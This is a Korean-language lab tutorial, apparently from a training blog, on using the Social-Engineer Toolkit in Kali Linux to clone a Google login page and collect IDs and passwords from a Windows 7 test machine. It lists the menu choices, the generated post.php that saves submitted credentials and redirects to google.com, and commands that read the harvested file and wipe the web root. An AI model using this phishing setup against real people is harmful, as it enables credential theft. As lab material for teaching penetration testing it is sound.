metasploit 15. SET(Social Engineering Tech.)

 

SET(Social Engineering Tech.)

 

 

 

■ 사용시스템

- Kali Linux

- Windows 7

 

 

패스트 트랙(Fasttrack): 자동 공격 도구

메타스포로잇 모듈을 사용한다.

이 도구는 메타스포로잇에 기반을 두고 있고 공격 기법 중 하나인 Autopwn 공격은 내장되어 있는 

기능 중 엔맵(nmap)을 통해 네트워크 스캐닝 작업을 하여 대상 시스템을 검색하고, 

그에 대한 운영체제, 포트, IP 주소를 분석하며 그에 해당하는 모든 취약점을 자동화 스크립트로 공격한다.

칼리리눅스에서는 SET(사회 공학 기법)에 통합되었다.

 

SET(Social Engineering Tech., 사회 공학적 공격 기법)

사회공학이란 컴퓨터 보안에서 인간 상호작용의 깊은 신뢰를 바탕으로 사람들을 속여 

정상 보안 절차를 깨트리기 위한 비기술적 침입 수단이다.

APT(Advanced Persistent Threat) 공격이 이제 공공기관과 특정 사용자를 타겟 대상으로 접근하다 

보니 더욱더 내부적인 보안에 신경을 쓰게 되었다.

 

 

SET 실행하는 방법

Kali Linux > Exploitation Tools > Social Engineering Toolkit > setoolkit

or

# setoolkit

 

 

 

 

[실습] Fake Google WEB Site 구성 - ID/PASS 모으기 위한 설정

 

(KaliLinux)

 

① SET 주설정 파일(EX: set_config) 설정

 

        KaliLinux 1.x) /usr/share/set/config/set_config

        KaliLinux 2.x) /usr/share/set/config/ 디렉토리 자체가 존재하지 않는다.

                -> 칼리 2.0 버전에서는 설정할 필요가 없다.

# vi /usr/share/set/config/set_config

[수정전]

SELF_SIGNED_CERT=OFF

[수정후]

SELF_SIGNED_CERT=ON

-> http://chogar.blog.me/80210217409 칼리리눅스에서 SET 사용법에 대한 자세한 내용

-> 칼리리눅스 2.0 버전에서는 set_config 파일이 존재하지 않는다. 따라서, 칼리리눅스 2.0 버전인

경우에는 이 파일을 설정할 필요가 없다. 

② SE Tool Kit 실행(Fake Google WEB Site 구성 - ID/PASS 모으기 위한 설정)

# setoolkit 

<ENTER>

Select from the menu:

 

1) Social-Engineering Attacks        SE어택

2) Fast-Track Penetration Testing

3) Third Party Modules

4) Update the Social-Engineer Toolkit

5) Update SET configuration

6) Help, Credits, and About

 

99) Exit the Social-Engineer Toolkit

 

set> 1

Select from the menu:

 

1) Spear-Phishing Attack Vectors     피싱공격

2) Website Attack Vectors            웹어택 방식

3) Infectious Media Generator            미디어 형태 제작(CD에 auto run),auto run USB 악성코드 

4) Create a Payload and Listener            서버에 기동시킬 Payload 만들기

5) Mass Mailer Attack                        대량 메일 공격

6) Arduino-Based Attack Vector                  아두이노(미니pc) 공격      

7) Wireless Access Point Attack Vector            WAP 공격*

8) QRCode Generator Attack Vector                QR코드(URL)

9) Powershell Attack Vectors                    파워쉘 공격

10) Third Party Modules

 

99) Return back to the main menu.

 

set> 2

 

1) Java Applet Attack Method

2) Metasploit Browser Exploit Method

3) Credential Harvester Attack Method

4) Tabnabbing Attack Method

5) Web Jacking Attack Method

6) Multi-Attack Web Method

7) Full Screen Attack Method

8) HTA Attack Method

 

99) Return to Main Menu

 

set:webattack> 3

 

        [TERM2] 웹서비스 초기화(이전에 실습한 적이 있는 경우)

        # cd /var/www/html

        # rm -rf /var/www/html/*

        # service apache2 restart

        # pgrep -lf apache2     

1) Web Templates

2) Site Cloner

3) Custom Import

 

99) Return to Webattack Menu

 

set:webattack> 1

[-] Credential harvester will allow you to utilize the clone capabilities within SET

[-] to harvest credentials or parameters from a website as well as place them into a report

[-] This option is used for what IP the server will POST to.

[-] If you're using an external IP, use your external IP for this

set:webattack> IP address for the POST back in Harvester/Tabnabbing: 192.168.20.50

 

1. Java Required

2. Google

3. Facebook

4. Twitter

5. Yahoo

 

set:webattack> Select a template: 2

.....

<ENTER>

    [TERM2] Fake Google 사이트 확인

    # cd /var/www/html

    # ls

    # cat index.html

    # cat post.php

    # cat harvester_*.txt

    # pgrep -lf apache2 

cat post.php

<?php $file = 'harvester_2017-01-06 17:24:26.396353.txt';file_put_contents

($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv="refresh" content="0; url=http://www.google.com" />

ID/PASS 입력 -> 웹브라우저 해석 -> 변수 값 -> POST방식 내용을 파일 안에 APPEND파일로 저장

사용자가 키보드를 입력을 하면 그 내용을 파일에 집어 넣고 화면을 refresh(www.google.com)로 넘기는 과정

# grep post.php index.html

<form novalidate method="post" action="http://192.168.20.50/post.php"http://192.168.20.50/ServiceLoginAuth" id="gaia_loginform">

사용자가 로그인을 눌렀을 때 post.php를 실행 시킨다.

(windows7)

③ 윈도우 7 에서 웹브라우저(EX: firefox)를 통해 192.168.20.50 웹서버에 접속

 

firefox 브라우저를 사용하여 아래 사이트에 접속한다.

-> http://192.168.20.50/

-> 구글 사이트가 보임

적당한 아이디/패스워드를 입력한다.(적당히 입력한다.)

ID : 이메일(EX: test1234@gmail.com)

PASS: 암호 (EX: test1234)

 (KaliLinux)

 

④ 칼리리눅스에서 ID/PASS 수집된 정보 확인

 

KaliLinux 1.X) /var/www

KaliLinux 2.X) /var/www/html

 

# cd /var/www/html

# cat harvester_*.txt 

[참고] 파일 백업

# mkdir -p /backup

# cd /var/www/html

# tar cvzf /backup/FakeWEB1.tar.gz .

# rm -rf /var/www/html/*